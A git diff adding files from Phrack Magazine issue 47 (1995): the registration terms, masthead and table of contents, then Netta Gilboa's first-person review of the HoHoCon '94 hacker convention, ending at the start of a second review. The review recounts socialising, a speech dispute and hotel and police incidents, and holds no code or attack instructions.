+But anyway, enough of my rambling, here is Issue 47.
+
+-------------------------------------------------------------------------
+
+                        READ THE FOLLOWING
+
+                IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.  Cost is $100.00 US per user for
+subscription registration.  Cost of multi-user licenses will be
+negotiated on a site-by-site basis.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+Enclosed is  $________
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Hard Copy:       _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
+                3L33t : No One
+                 News : Datastream Cowboy
+               Busted : Kevin Mitnick
+                Busty : Letha Weapons
+          Photography : The Man
+      New Subscribers : The Mafia
+    Prison Consultant : Co / Dec
+           James Bond : Pierce Brosnan
+     The Man With the
+          Golden Gums : Corrupt
+Good Single/Bad Album : Traci Lords
+            Thanks To : Voyager, Grayareas, Count Zero, Loq, J. Barr,
+                        Onkel Ditmeyer, Treason, Armitage, Substance,
+                        David @ American Hacker/Scrambling News Magazine,
+                        Dr. B0B, Xxxx Xxxxxxxx
+    Special Thanks To : Everyone for being patient
+  Kiss My Ass Goodbye : Dell Computer Corporation
+
+Phrack Magazine V. 6, #47, April, 15 1995.   ISSN 1068-1035
+Contents Copyright (C) 1995 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission of the Editor-In-Chief.  Phrack Magazine is made available
+quarterly to the amateur computer hobbyist free of charge.  Any
+corporate, government, legal, or otherwise commercial usage or
+possession (electronic or otherwise) is strictly prohibited without
+prior registration, and is in violation of applicable US Copyright laws.
+To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
+the list.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278              (Phrack Mailing Address)
+                    Austin, TX 78701
+
+                    ftp.fc.net                       (Phrack FTP Site)
+                    /pub/phrack
+
+                    http://www.fc.net/phrack.html    (Phrack WWW Home Page)
+
+                    phrack@well.sf.ca.us             (Phrack E-mail Address)
+                 or phrackmag on America Online
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
+
+Phrack goes out plaintext...you certainly can subscribe in plaintext.
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6
+
+mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
+Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
+Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
+tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
+=evjv
+-----END PGP PUBLIC KEY BLOCK-----
+
+  -= Phrack 47 =-
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by The Editor                                         16 K
+ 2. Phrack Loopback / Editorial                                        52 K
+ 3. Line Noise                                                         59 K
+ 4. Line Noise                                                         65 K
+ 5. The #hack FAQ (Part 1) by Voyager                                  39 K
+ 6. The #hack FAQ (Part 2) by Voyager                                  38 K
+ 7. The #hack FAQ (Part 3) by Voyager                                  51 K
+ 8. The #hack FAQ (Part 4) by Voyager                                  47 K
+ 9. DEFCon Information                                                 28 K
+10. HoHoCon by Netta Gilboa                                            30 K
+11. HoHoCon by Count Zero                                              33 K
+12. HoHo Miscellany by Various Sources                                 33 K
+13. An Overview of Prepaid Calling Cards by Treason                    29 K
+14. The Glenayre GL3000 Paging and Voice Retrieval System by Armitage  25 K
+15. Complete Guide to Hacking Meridian Voice Mail by Substance         10 K
+16. DBS Primer from American Hacker Magazine                           45 K
+17. Your New Windows Background (Part 1) by The Man                    39 K
+18. Your New Windows Background (Part 2) by The Man                    46 K
+19. A Guide To British Telecom's Caller ID Service by Dr. B0B          31 K
+20. A Day in The Life of a Warez Broker by Xxxx Xxxxxxxx               13 K
+21. International Scenes by Various Sources                            39 K
+22. Phrack World News by Datastream Cowboy                             38 K
+
+                                                    Total:            807 K
+
+_______________________________________________________________________________
+
+"Raving changed my life.  I've learned how to release my energy blockages.
+ I've been up for forty-eight hours!"
+         John Draper (Capn' Crunch) in High Times, February 1995
+
+"You never know, out in California, all them Cuckoo-heads."
+         Brad Pitt as Early in "Kalifornia"
+
+"On the Internet you can have the experience of being jostled by a 
+ urine-smelling bum."
+        Bill Maher - Politically Incorrect
diff --git a/phrack47/10.txt b/phrack47/10.txt
new file mode 100644
index 0000000..0becca1
--- /dev/null
+++ b/phrack47/10.txt
@@ -0,0 +1,464 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 10 of 22
+
+
+                                  HoHoCon '94
+                    December 29, 1994 - January 2, 1995
+                       Ramada Inn South, Austin, TX
+                 A Review, released to the Net on 1/25/95
+                        By Netta "grayarea" Gilboa
+
+
+   I flew to Austin, TX after spending Christmas with some hacker friends.
+I arrived a day early, unsure if the Con was gonna come off and how many
+people would show if it did. HoHoCon had almost been cancelled this year
+after someone called the original hotel and said a bunch of mean, evil
+hackers were gonna descend on the hotel and that several federal agencies
+would be sending feds there to monitor it. If you ask me, some kid's mom
+said he couldn't go so he decided to try to make sure none of us could
+either. Lame. It also taught me that everyone in this community has
+enemies. Maybe someone just doesn't like Drunkfux. Supposedly, right after
+this phone call the hotel got another, this time from Dateline NBC who
+wanted permission to film the Con. Rumor had it the hotel panicked and
+cancelled. The truth is that a regular client of theirs offered to pay
+higher room rates and the hotel stood to make over $20,000 extra by
+getting rid of us and having them there instead. So they used the phone
+calls as an excuse. I can only imagine the hassles Drunkfux went
+through to find another hotel that was empty on New Year's Eve weekend.
+
+   But Drunkfux came through with flying colors and when I got to the
+hotel they told me other people had started to arrive. They gave me a
+list of these people to look at, complete with their real names and room
+numbers. It's possible they would even have xeroxed the list if I had
+asked them to. Uncool. Even more uncool, almost shocking, was that the
+hotel had a clipboard on the counter with people's real names, assigned
+room number and credit card number complete with expiration date. It was
+listed in alphabetical order and I was on the top page in the third spot.
+I freaked. I told the woman behind the counter that she must move the
+clipboard as some of the people coming specialized in attacking people's
+credit and that I would surely be a target given my position on the list
+and my all too well-known real name. She said okay but when I returned my
+luggage cart, some twenty minutes later, it was still on the counter. I
+told her again, nastier this time, to move it. An hour later she still had
+not. I then asked to use a phone and was told there was one in my room and
+another down the hall. I explained that I wanted to call right from the
+counter to cancel my credit card and to call the national offices of Ramada
+Inns to have her fired. In a nasty tone she told me she'd move the clipboard.
+She did. However, the next day they threw the pages in the trash and, of
+course, had the clipboard on the counter again with a new list of the people
+due to check in that day. I argued with them again and they moved it. A few
+hours later (surprise!) their trash was invaded and they went out and bought
+two paper shredders. This was a good investment on their part although it's
+a shame it took us to teach them that. If you intend to stay at a Ramada Inn
+anywhere in the U.S., I would strongly advise you not to prepay with a credit
+card. They can't be trusted with your data. We invite readers who may have
+experienced credit card fraud after staying at Ramada Inns (or other hotels)
+to contact us. It was a sobering lesson in how vulnerable the average person
+is in society.
+
+   I had plans to hook up with Stormbringer and Holy Spirit, two virus
+writers I love talking to. Stormbringer had recently retired from virus
+writing after hearing from someone in Singapore who got infected with
+one of his non-malicious viruses. I had read his retirement text file and
+was anxious to talk to him about it. He assured me on the phone all was well
+and they agreed to meet me at Mr. Wasabi for sushi and I ate more sushi
+than I ever had before in one sitting. Then we walked to a coffee house
+and they drove me back to my hotel around 1 a.m.
+
+   I was invited to Novocain and Particle's room so I headed up there and
+ran into Veggie, Onkel Ditmeyer, Count Zero, Buckaroo, etc. Onkel showed
+me his way cool laptop and I finally got to see what an IBM demo looks
+like. These are programs which demonstrate the sound and graphics
+capabilities of a computer. He copied a few of them on a disk for me along
+with some electronic magazines I had never seen. Onkel is the author of a
+well known phreaking program called Bluebeep. We spoke a lot over the
+weekend and I found him brilliant, honest, charming and not afraid of
+girls who know way less than him. He was one of the coolest people at
+HoHoCon this year.
+
+   At 6 a.m. a few of us went downstairs for free breakfast and the
+conversation turned to the various women who hang out on #hack. There
+was some dissing of one girl who has slept her way around the scene and
+in the past had given a number of hackers herpes without telling them
+first. Eeks. I tried to get out of the guys I was eating with what she
+had that I didn't (besides herpes). I message most of her old lovers on
+IRC but none has ever made a pass at me. We talked about the other girls
+on IRC, who has slept with whom, and how they got treated afterwards. We
+talked about why people might have slept with those particular girls at
+the time they did and I suddenly felt both very lucky and better about
+myself that the one hacker I had slept with was a decent choice. Quality
+might beat quantity. To know for sure, I guess I'd have to ask the girls
+<wink>.
+
+   We picked up a bunch of food that was apparently not included in our
+free breakfast coupon. The waitress didn't know how to handle it and
+neither did we. I offered to put the food back and she finally agreed to
+let us eat it. I suggested they put up a sign to warn others and, of
+course, they didn't. Later I heard they let us all eat the bacon and other
+food for the rest of the Con. I never made it back down there again even
+though for American food it was pretty good. I was pretty tired and so
+headed off to sleep when we were done chowing down.
+
+   I woke up Friday afternoon when Particle and Novocain knocked on the
+door. They had a car and took me to a Chinese restaurant nearby with a
+killer buffet. When we got back there were many people in the lobby
+listening to a tape of prank phone calls made by Phone Losers of America.
+I wanted the tape bad as it seemed highly appropriate for us to review.
+I was promised a copy which materialized in under an hour. W0rd! For all
+the shit I take for it, there are advantages to being press.
+
+   I felt pretty comfortable with all of the people I was talking to and
+since my room was very close to the lobby I invited everyone there and
+even left the door open for others to enter my room (which almost
+everyone who passed by did). It was kind of odd where they had situated
+me. You could watch my door from the counter where people checked in. I
+had asked for a smoking room but got dealt non-smoking instead. I
+inquired about changing it and was told some crap about all the rooms
+being accounted for already. It crossed my mind at the time that maybe
+some feds had purposely put me there but I discounted my gut feeling and
+remembered most hackers thought I was too paranoid about things. I told
+people to go ahead and smoke in my room with no ashtray. They did. All
+told about 15 people were in there and one of them pulled out a toy
+to show me. It was a box that hooked up to your telephone which allowed
+you to change your voice into that of a male, female or child. I had seen
+these boxes before in catalogs. They sure work great! I made two calls
+with it, one to a friend and one to my ex-husband. I snickered at how
+surprised they'd be when they heard my message and later regretted not
+telling either or them to save it so I could hear it back. Honestly,
+playing with this legal box was every bit as cool as great drugs or sex.
+I vowed to buy one. Watch out!
+
+   Talk turned to dinner and people started to leave my room. Particle was
+the last one out and he showed me something about how the hotel room locks
+worked. Hackers spend hours trying to figure out how things work and
+although I had little interest in the subject it was clear Particle was
+struck by the technology and not the idea of breaking into someone's
+room. I started to organize people who were willing to eat sushi. Just as
+we were about to leave Particle and Novocain were gathering everyone into
+a room to tell people to chill their behavior. It later turned out that
+Particle had played with another lock after I made him stop touching
+mine. He had the misfortune to be seen by a member of the Austin Police
+Department who wisely agreed not to arrest him in exchange for Particle's
+agreeing to talk to people in an attempt to curtail the usual HoHoCon
+hotel destruction. I should have attended this talk although I had no
+idea at the time why it was being organized. But I was starving and
+the people I took to eat sushi were not those who would consider trashing
+a hotel. Laughing Gas, Thumper27, Slyme, El_Jefe and I checked out Kyoto
+sushi which was good but expensive for what you got. I spent part of dinner
+wiping the free space on the hard drive on my laptop. I had never used
+this feature before, but had been told about it at the con and it sounded
+like something I should start doing regularly to protect other people's
+privacy so that erased E-mail and articles were truly erased. It was a
+good thing I had sushi to eat to keep me busy as it took a good twenty
+minutes to do on a Pentium laptop with a 500+ meg hard drive.
+
+   When we got back to the hotel I ran into Drunkfux who had cut his
+hair and dyed it bright red. I hardly recognized him but it looked great.
+It was clear by the police presence in the lobby that the Con had
+officially started. We were told that signs hung on room doors (I had
+put up a copy of one of the magazine covers with a small piece of scotch
+tape) would be taken down. This made it much harder for us to find each
+other (I'd estimate we had 90% of the hotel's rooms) but so it goes.
+Some people were told specifically that they could not use their modems
+and for hours on Friday night the phone lines were so busy with modem
+usage that there was no way to make an outgoing call or to receive an
+expected incoming one. All sorts of security guards appeared. The ones
+I spoke with were police officers too. I'd guess there were 1-3 dozen
+around at all times and apparently hotel personnel were told they were
+all on duty until we left and none of them were able to go home for the
+rest of the weekend. I wish I could say this was utterly unwarranted.
+But some lamer broke the lock on the door to the hotel's phone system.
+And remember that another person had trashed the hotel's garbage and
+must have made a mess or been spotted.
+
+   The hot party that night was in Erik Bloodaxe's room. Loki, Ice-9
+and Ophie were staying with him and Loki was in charge of the door.
+He made sure to keep me out just as he does when he acts like a bully
+on IRC. I knew in my heart it was Loki's doing not ErikB's, but that
+didn't stop me from getting majorly upset about it anyway. I went
+downstairs to be alone and Particle knocked on the door a few minutes
+later. I gave him a piece of my mind and then some about how shitty
+some of those in the computer underground are. I went on for at least
+an hour and drew great comfort from the fact Particle thought I was not
+crazy and that things are as awful as they seem sometimes. Finally
+he told me that since I kept claiming to love hackers despite all of the
+grief, there were dozens of nice ones out there who would be thrilled to
+talk to me if I'd only leave my room and go try to have a good time. W0rd.
+I took his advice and had a good time in the lobby with the other rejects
+from Bloodaxe's party. The conversation was so good it was hard to tear
+away to go to sleep. I went to my room at 4:30 a.m., got under the covers,
+thought about sleep for 10 seconds. Then I pulled out my laptop and wrote
+a speech to deliver to the crowd the next day.
+
+   The two people I had counted on to wake me up didn't show and it was a
+stroke of luck that made me jump up at 9:45. The speeches were supposed to
+start at 10 a.m. and even though they surely wouldn't start till later I
+was selling magazines and was due there pronto to claim my table. It took a
+luggage cart to get all those magazines downstairs. I shudder to think what
+my life will be like when I have 30 issues to lug around instead of six.
+The folks from Fringeware were selling books and T-shirts and someone else
+had old Atari game units and cartridges. People came by to say hi and to
+buy magazines. I plugged my speech and told people not to dare miss it.
+
+   It was impressive that Drunkfux had gotten so many original speakers
+on such short notice. They mostly said what the crowd wanted to hear and
+shared thoughts on digital cash, the regulation of the Internet, recent
+laws, etc. Damien Thorn showed a video clip to the tune of the current
+rock hit "21st Century Digital Boy" which had cellular phones, scanners,
+etc. in it. It's part of an upcoming video that looked awesome. Veggie
+talked about dealing with the media after an old text file of his was
+used to harass a BBS sysop who got more than twice Phiber's jail sentence
+just for having a file around.
+
+   Someone sent Erik Bloodaxe to talk to me as part of my speech referred
+to him. It was an uncomfortable talk and I was probably correct in feeling
+that half the room was watching us and not whoever was speaking. I told
+him he could pay me back in print or elsewhere but that I was going to
+go ahead with what I planned to say and he surprised me by saying that
+what I had written was fine and he even added to it. He also told me
+that Loki had gotten too drunk and had been a pain in the ass to room
+with the night before. He assured me that although way too many people
+had been in his room, and way too many had tried to get in after it was
+full, it had not been his intention to keep me out. I felt bad that I
+even cared, and that he knew I cared, and that he and I even had to
+discuss it. I was unhappy that he had no intention of staying to hear my
+speech or the fight with Loki that he knew was coming but didn't
+mention to me. We left things with the fact that we'd go out for dinner
+or something the next night with Ophie (who also had an early flight)
+after the bulk of the Con was over. It occurred to me then it would never
+happen because plans are hard to keep at Cons but I mentioned it in my
+speech anyway.
+
+   My speech went over very well. It was about what's been going on at
+Gray Areas since I spoke at HoHoCon last year. It was also about the
+behavior of certain elements of the community and how that behavior has
+affected me. And it was a stern warning about some busts that are coming
+down. I know a few people got the message. I could tell from the gasps
+and laughter at key points. But perhaps the highlight of the speech was
+the confrontation between Loki and I when he chose to bully me before
+anyone else could ask a question. I answered his accusations and managed
+to do a decent job even with no warning. Whatever he hoped to accomplish
+clearly wasn't working and from somewhere deep inside of me I found the
+courage to ask the entire room to vote on whether or not they really
+never wanted to see me on #hack again. The only vote opposed in a room of
+about 250-300 people was Loki's. Hours later I regretted not thinking to
+ask how many people never wanted to see Loki there again. Four people had
+come up to me and told me they would have voted him out. Loki left the
+room with his tail between his legs and ran to IRC. By the time I got on
+hours later word had spread a story that I picked a fight with him and
+he had won. The proof is in the videotape which will be available soon
+from Drunkfux. It's highly recommended for both friends and foes of mine.
+Drunkfux said demand for this portion of his footage was very high. I
+promised to give him better footage and an even better speech next year.
+
+   Later Count Zero wrote this about my speech in Cult of the Dead Cow:
+"Grayarea gets up and begins to read off a pre-prepared speech on her
+laptop. Her speech is too quick for my alcohol-byproduct-sodden synapses
+to register accurately. I keep staring at her dress...bright tie-dye...
+mesmerizing...it's actually quite cool. Suddenly, Loki gets up in the
+audience and the accusations fly back and forth between them. You kicked
+me off IRC. You called my office at work. You are doing this, you are
+doing that. Both are getting into this verbal slugfest in a major way.
+I feel the bad karma in the room hanging heavy like blue-green cigar
+smoke. "Can't we all just get along??" I yell, but no one seems to hear
+me. I don't know who is right or wrong (it's probably somewhere in
+between...the truth's always gray, right?), so I don't hypothesize. All I
+do know is that I'd never want to piss off Grayarea...she's damn strong
+on her convictions and won't take shit from anyone. I think she'd look
+better up there wearing a big ol' leather jacket with studs...terminator
+style. "One tends to assume that people wearing tie-dye gear are quiet,
+meek, very soft spoken, non-confrontational types....it is a camouflage
+that suits her well," I think. Bahaha! I liked your comments, Count Zero.
+And I did hear you yell that.
+
+   After the speeches I sold more magazines thanks to Loki who
+inadvertently made way more people interested in me. Bahahaha! Some of
+them said they liked or loved my dress, some of them hugged me and some
+of them signed up for subscriptions and gave me their data. I then
+headed off for dinner at yet another sushi restaurant. Laughing Gas
+and Slyme came again along with Mr. Spock who agreed to lose his sushi
+virginity to me and jokingly said that way he'd get mentioned in my
+review. I thought he was one of the three kewlest people I hung out with
+at the Con. I hope I get to spend more time with him at a Con in the
+future and I'd even be willing to go try his favorite type of food! The
+sushi place we picked was awesome. I was sorry I hadn't found it
+sooner. It's almost too bad HoHoCon will be in another city next year.
+I also wanna mention the elite, Jak_Flack, who drove us to the restaurant
+when cabs were scarce on New Year's Eve. He didn't want any sushi or
+any money. He even got lucky and gave a ride to people who probably
+would have done the same thing for him under the same circumstances.
+Thanks.
+
+   After dinner I did what Drunkfux begged us not to do. I spent New
+Year's Eve on IRC. I messaged Mr. Spock, in fact, who was typing from
+the other side of the room. I also messaged some hackers I talk to all
+the time. Some were lonely and glad to see me. I thought a lot about
+loneliness. Some of us prefer to be with computers than people. Some of
+us can open up more easily to people on a computer. And some of us need
+computers around even when we're with other people. I was typing from an
+account at hohocon.org and there were several people in the room having
+fun with their "site" as X and Y tried repeatedly (and succeeded) to get
+root there. I had never seen root before from the position of the person
+protecting it. I should have paid way more attention but I got too caught
+up in having conversations. I should also have paid more attention to the
+people in the room with me. Loq and Fool were there and they seemed really
+kewl but I got too lost in IRC. Oh well, at least I wasn't hopelessly
+drunk. And I wasn't kicked or banned once. People were delicate with each
+other on IRC. They were often drunk, vulnerable and more likely to reveal
+things when conversing. Those who were on were more than willing to talk
+to anyone who showed up. People apparently intend to make public the
+hohocon.org logs. If they include IRC chats it would be very shallow. I
+will never again take the chance and IRC from a Con again. Although I have
+mostly come to terms with the fact that I am a semi-public figure and
+people will always want to see whatever I type on the Net, but it's not
+fair to expose the words of the people I messaged.
+
+   I dragged myself off IRC about 4:30 a.m. and went downstairs to clean
+off one of the beds. Novocain and Particle had checked out of their room
+and were gonna stay in my room for one night. I was thrilled at the idea
+of having company. But when the bed was empty it looked tempting and I
+lay down for the 90 minutes till I was due to meet them at the breakfast
+buffet. Next thing I knew it was Sunday afternoon. Oops! I wondered where
+they had slept. Apparently they hadn't wanted to wake me so they slept
+in another room. I felt bad but at least their stuff had been safe which
+is all you really care about at a Con. SORRY! Next time, guys, wake me.
+
+   I stumbled into the lobby and joined the conversations that were going
+on. A hotel employee asked if we'd mind moving to the conference room and
+we agreed. We figured the room was bugged just as the hotel phone lines
+had been. But we weren't talking about anything secret and a few of the
+hackers answered all of the questions asked by the cop/security guard who
+hung out for about half of the time we were in there. It was a very fun
+time there on the floor chatting with Voyager, Ophie, Onkel Ditmeyer, lgas,
+Deadkat, Drunkfux, etc. There were way more people but I'm drawing a blank
+on specifically who. I went upstairs to get more magazines and ran into
+Bruce Sterling. He was growing facial hair and looked great. He said he
+felt lousy which shows what I know. I hugged him before he said he felt
+lousy. We talked about the book he is working on. Then Ophie and I went
+off to be interviewed about female hackers and the treatment of women by
+hackers. It could have used Cori and Noelle but it made some good points.
+We came downstairs and I saw Drunkfux at work videotaping an interview
+with the guys from TNO in Colorado. This was priceless footage of them
+discussing how a group decides policies and handles politics and how they
+have applied political thought to hacking. I was sorry I had missed half
+of it and sorry I had spent so much time socializing with them that it
+had never occurred to me I didn't know much about their group and I should
+have interviewed them too. I hope Drunkfux includes every word of their
+interview in the video.
+
+   Ophie brought up the idea of photos and so I grabbed my camera.
+Everyone there got into it and I got a whole roll of film of people
+hugging and kissing me, looking at porn mags with Ophie and generally
+playing around somehow. They came out great. If you want yours passed
+around or published, let me know. Until then, they're private.
+
+   Slyme and I headed back to Mr. Wasabi for dinner but to our surprise
+it was closed! New Year's day turned out to be a bad day to try to find
+places open to serve food. We should have stayed at the hotel. We finally
+ended up in a bar which served food, ordered hot chocolate and consoled
+ourselves on the lack of sushi. Back at the hotel a bunch of us went
+room hopping and tried to determine who was left. My flight was at 7 a.m.
+and I had no intention of going to sleep and taking a chance I would miss
+it. Several people had flights at 8 and 10 a.m. Others were staying on
+for 3 more days to get better airfare rates. I heard ErikB had left with
+Ophie and he told me later they had asked the hotel and had been told I
+checked out. One room we ended up in had a console copier running. I had
+heard about them but never seen one and was told it was okay if I
+photographed it. I went downstairs for my camera.
+
+   I hadn't been alone once since arriving in Austin. While this wasn't
+always planned, the thought did occur to me that my room might be watched
+and that law enforcement might be interested in any of the many people
+I was seen talking to. I had mentioned a controversial interview we had
+coming up with ILF and although I thought I was being overly paranoid, I
+was still nervous I would be questioned about it. But it was 12:30 a.m.
+or so and I felt too silly asking for someone to run downstairs with me.
+So I went alone. But as I was closing the door and checking it was locked
+I saw someone head down the hall towards me and I knew instantly something
+was about to be up. Hackers are right when they say you can't fully
+understand this until you have lived it. He asked if I was Netta and I
+said yes and then he reached towards his pocket. I knew he was going for
+either a gun or a badge and there was nothing I could do about either.
+It turned out to be a badge and as he got close enough so that I could
+see it read "Austin Police Department" I thought to myself "Kewl, it's
+not the Secret Service." He asked me to accompany him to a room and,
+holding my camera, I did. He told the two "security guards" that we'd be
+leaving the door open. I had asked whether he was the guy who had
+called me last March and he said no that he was his partner. I wondered
+whether I was under investigation or whether they had no one else to ask
+for information or whether they just wanted to meet me after talking to
+me voice. It didn't occur to me to ask. I thought several times about the
+fact I was supposed to be out with Bloodaxe and Ophie and that if I had
+made it a point to leave with them this wouldn't be happening. I wondered
+who else APD had questioned who had not told anyone. I wondered if they had
+even questioned someone about me. I also feared people would come looking
+for me and see me in that room and think I was talking to the police
+voluntarily. That I had sought them out. God forbid they should think I
+was telling the police about the console copier.
+
+   The whole thing only took about 8 minutes and the officer asked me
+nothing I had a problem answering. He treated me with respect and didn't
+press me to say anything I wasn't comfortable saying. I offered to give
+him some of my magazines at the end of the conversation and he walked me
+to my room and was clearly planning to wait outside. I invited him in and
+he watched me pull issues from three suitcases. It was apparent nothing
+illegal had gone on in my room. I'd lay odds it was the cleanest room
+there too. The day before, for example, my trash in the bathroom had
+been dumped at least three times. None were by me or when I was in the
+room. The only thing I couldn't answer, and it was simply from nerves,
+was what I had done on New Year's Eve. The answer came out that I didn't
+remember and since I stammered it, it must have looked like I had seen or
+done something I shouldn't have. But all I did was IRC and eat sushi and
+I do that so often I didn't even remember when asked. New Year's Eve had
+been almost like any other night.
+
+   Anyway, I got the console copier photo (hint: I could use a detailed
+article on how they work to run with it). We then moved on to other rooms
+and I ran into Drunkfux and Damien Thorn. I did a long video interview
+with Drunkfux, who would have made an excellent journalist. He resisted
+the idea of asking me petty questions about who I like and don't like in
+the scene and who I'd sleep with if I could. I would have answered
+anything he asked in the spirit of the HoHoCon video tradition, but
+instead we got into more serious issues and people who think Drunkfux is
+shallow or a less-than-serious dude due to his IRC reputation will be most
+surprised.
+
+   Then Damien did an equally long interview and Drunkfux got eleet footage
+of me closing my eyes when the talk got too technical. I did almost pass
+out as it was 3 a.m. or so and I felt really comfortable being with them
+but I snapped to attention just in the nick of time as Drunkfux had the
+camera aimed on me and Damien was making a joke. Damien took it in stride
+but I think it was the first time anyone had ever had the chance to listen
+to his most eleet technical tips and was bored. I hope he knows I love him,
+like most hackers, for the person he is and not for the skills or trophies
+he has. I was transfixed as he told Drunkfux his beginnings in the computer
+underground and his views on laws, ethics, writing, etc. I just don't lust
+to know what model of phones he respects most or what gadget he's tested
+last. Luckily for you, Drunkfux did the interview, not me, and he did ask
+lots on that sort of stuff. After they were done Damien and I went out to
+some fast food burger joint. It was dirt cheap and tasted like cardboard.
+We had a great chat, as usual, and then went to the airport with Slyme who
+had slept the night away and missed everything. My flight was first and
+they walked me to the gate and made a fuss over me and it was the perfect
+ending.
+
+   I can't believe I now have to wait till June (and go to Georgia, of
+all places) to see some of you again. Oh well. In the meantime, happy
+Valentine's Day to you and whoever you netsex and/or fantasize about.
+Happy April Fool's Day in advance too. Just prank someone else this year,
+okay? <grin>.
+
+(Sample issues of Gray Areas are $7.00 each (U.S.) and $10.00 each
+(foreign) from: Gray Areas, Inc. P.O. Box 808, Broomall, PA 19008.
+E-mail addresses are: grayarea@well.sf.ca.us or grayarea@netaxs.com or
+grayarea@mindvox.phantom.com. PGP key is below. Use it.)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3
+mQCNAi76UiwAAAEEALgwLwtyFrBlzHkfUlc5NIwLrIfbng5OJIG1Qlp1JN5UUaSR
+EMAu8gDqwOzXVS2TLYqbz5AHYw7zBTuVneYpMH6THv4iYN9iyXMu1LUby54HLbyP
+vZb61BnF9s4oyyZitGJ8F/IKnqGX5+jE3/6WvcJ0HxDJPL5jEA2uwNFX4WuNAAUR
+tBZncmF5YXJlYUB3ZWxsLnNmLmNhLnVz
+=rXPN
+-----END PGP PUBLIC KEY BLOCK-----
diff --git a/phrack47/11.txt b/phrack47/11.txt
new file mode 100644
index 0000000..e8e23bd
--- /dev/null
+++ b/phrack47/11.txt
@@ -0,0 +1,591 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 11 of 22
+
+
+   Yep, grab hold of yer brainstem cuz here comes another mind-numbing,
+   alcohol-soaked, synapse-shakin', reality-bending review of HOHOCON!!
+
+                 >>HOHOCON 1994...The Insanity Continues<<
+
+                        Direct from the keyboard of
